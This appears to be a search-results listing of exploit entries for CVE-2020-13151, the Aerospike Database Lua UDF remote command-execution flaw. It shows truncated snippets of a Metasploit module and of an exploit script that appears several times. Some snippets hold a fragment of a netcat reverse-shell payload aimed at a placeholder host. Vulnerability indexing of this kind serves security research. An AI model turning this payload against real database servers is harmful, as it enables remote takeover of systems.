7 matches found
Aerospike Database UDF Lua Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Aerospike Database UDF Lua Code Execution', 'Description' = %q Aerospike Database versions before 5.1.0.3 permitted user-defined functions UDF to...
Aerospike Database 5.1.0.3 Remote Command Execution
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...
Aerospike Database 5.1.0.3 - OS Command Execution Exploit
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect except Exception a...
Aerospike Database 5.1.0.3 - OS Command Execution
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...
CVE-2020-13151
creationtimestamp| type| source ---|---|--- 2020-08-05 16:55:16+00:00| seen| https://t.me/cibsecurity/13884 2020-12-10 17:14:31+00:00| seen| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/aerospikedatabaseudfcmdexec.rb 2021-05-17 01:38:24+00:00| seen|...
CVE-2020-13151
CVE-2020-13151 affects the Aerospike Community Edition, specifically versions around 4.9.0.5. The vulnerability allows an unauthenticated user to submit a crafted Lua UDF that can execute arbitrary OS commands via os.execute(), enabling remote command execution on all cluster nodes with the Aeros...
Exploit for OS Command Injection in Aerospike Aerospike_Server
CVE-2020-13151 POC Aerospike Database 5.1.0.3 Host Com...